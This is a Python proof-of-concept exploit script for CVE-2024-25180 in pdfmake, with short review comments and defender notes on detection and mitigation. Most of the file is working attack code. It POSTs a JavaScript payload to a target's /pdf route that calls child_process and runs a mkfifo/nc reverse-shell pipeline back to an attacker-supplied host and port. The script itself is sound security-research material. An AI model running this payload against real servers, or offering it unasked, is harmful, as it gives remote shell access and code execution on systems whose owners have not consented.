POC / CVE-2024-25180.py PY
#!/usr/bin/env python3

import sys
import requests

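# Proof-of-concept client for CVE-2024-25180 (pdfmake). It sends one HTTP POST
# to the target's /pdf route with a JSON body whose "content" field carries
# JavaScript source instead of a document definition.
# NOTE(review): the payload only has an effect if the server evaluates
# "content" as code inside its Node.js process -- the server side is not shown
# here; confirm the affected component against the vendor advisory.
#
# Defender notes:
#   * Detection: POST bodies to /pdf containing "process.mainModule" or
#     "child_process", and the PDF service process spawning a shell or nc.
#   * Mitigation: keep this endpoint off untrusted networks and never evaluate
#     request data as code; treat the document definition strictly as data.
banner = "CVE-2024-25180 Remote Code Execution in pdfmake"
print(banner)

# Exactly four positional arguments are required. The usage branch used to
# print an undefined name (`banner`), so a wrong argument count ended in a
# NameError instead of the usage text; the banner is now defined above and
# printed once.
if len(sys.argv) != 5:
    print("Usage: {} <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>".format(sys.argv[0]))
    sys.exit(1)

# Arguments are used as given; nothing here validates them.
target_ip = sys.argv[1]
target_port = sys.argv[2]
local_ip = sys.argv[3]
local_port = sys.argv[4]

url = f"http://{target_ip}:{target_port}/pdf"
headers = {'Content-Type': 'application/json'}
# "content" holds a JavaScript expression, not document content: it reaches
# child_process through process.mainModule and runs a shell pipeline that
# connects back to LOCAL_IP:LOCAL_PORT.
# NOTE(review): the trailing `const dd = 2` presumably satisfies a `dd`
# definition the server expects -- confirm against the server code.
data = {
    "content": "this.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc {} {} >/tmp/f').toString(); const dd = 2".format(local_ip, local_port)
}

try:
    # verify=False only disables TLS certificate checks; it has no effect on
    # this plain http:// URL. No timeout is passed, so the call blocks until
    # the server responds or the connection drops.
    response = requests.post(url, headers=headers, json=data, verify=False)
    response.raise_for_status()
except requests.exceptions.RequestException as e:
    # Connection failures and non-2xx statuses are reported, not re-raised.
    print(f"An error occurred: {e}")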